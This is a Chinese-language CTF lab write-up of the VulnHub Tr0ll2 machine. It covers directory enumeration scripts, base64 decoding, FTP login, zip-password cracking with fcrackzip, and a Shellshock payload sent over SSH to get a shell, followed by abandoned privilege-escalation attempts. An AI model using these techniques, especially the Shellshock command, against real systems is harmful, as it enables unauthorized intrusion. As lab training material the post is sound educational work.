Tr0ll2靶机测试笔记

vulnhub-Tr0ll2

Netdiscover nmap

先看下网页 还是这个

使用dirsearch扫下目录

访问robots.txt

好吧这么多目录 找吧，
有提示，并且图片名称有意思

找到最后发现除了空目录就是上面这张图，没有其他线索了，尝试下载这张图片看看

import os

os.system('wget http://192.168.0.103/robots.txt')
with open('robots.txt','r') as f:
	for line in f.readlines():
		os.system('wget http://192.168.0.103' + line)

执行脚本 发现有四个目录是可以访问的，但是大小都一样

仔细看了下内容发现都一样的，不知道线索在哪，查看网页时发现打开图片后这儿图片的目录是不一样的，那么说明这4个目录里的同名图片可能不是同一张

尝试再看下图片信息

import os
jpgs = ['dont_bother','keep_trying','keep_trying','ok_this_is_it']
for line in jpgs:
	os.system('wget http://192.168.0.103/'+ line + '/cat_the_troll.jpg')

发现第一张图片即don’t_bother里的图片大小不一样

如图片文件名般cat cat_the_tholl.jpg，果然执行完提示就出现了

出来一串base64编码，不知道干啥的，先解码吧

import os

os.system('wget http://192.168.0.103/y0ur_self/answer.txt')
with open('answer.txt','r') as f:
	for line in f.readlines():
		os.system('echo \"' + line.strip() + '\" | base64 -d')

执行代码，因为在调试的过程中发现有重复的，所以执行代码时还要去重保存

但是web这儿线索中断了，尝试ftp和其他服务吧
nmap扫描ftp时未报anonymous可以访问，所以匿名应该登录不上的，但是它好像有提示

果然输入Tr0ll Tr0ll可以登录

下载文件解压，这儿发现之前的密码干啥的了，因为这儿解压需要密码

使用fcrackzip爆破密码，速度很快 ItCantReallyBeThisEasyRightLOL

解压出了noob的key

尝试连接ssh，好吧还有TRY HARDER LOL！

它应该是连接上了服务器，但是服务器设置了规则主动中断，依稀记得有篇文章讲这个的
好吧断掉了 参考这篇文章后发现可以使用shellshock

ssh -i noob noob@192.168.0.103 '() { :;}; /bin/bash'
可以拿到shell

提权：
开启http服务，传输枚举文件

Python3 -m http.server 80

发现是低版本内核，和底下suid程序，这个door1,2,3非常类似于之前的靶机Lord_Of_The_Root1.0.1，作者制作这个说明这儿肯定是可以提权的了，但是我不继续了。。

尝试找下内核漏洞

一顿操作后，发现提不成功，应该是打了补丁，不继续了
Door提权继续看这儿吧

标签：http,0.103,Tr0ll2,笔记,192.168,line,txt,os,靶机
来源： https://www.cnblogs.com/zongdeiqianxing/p/13550965.html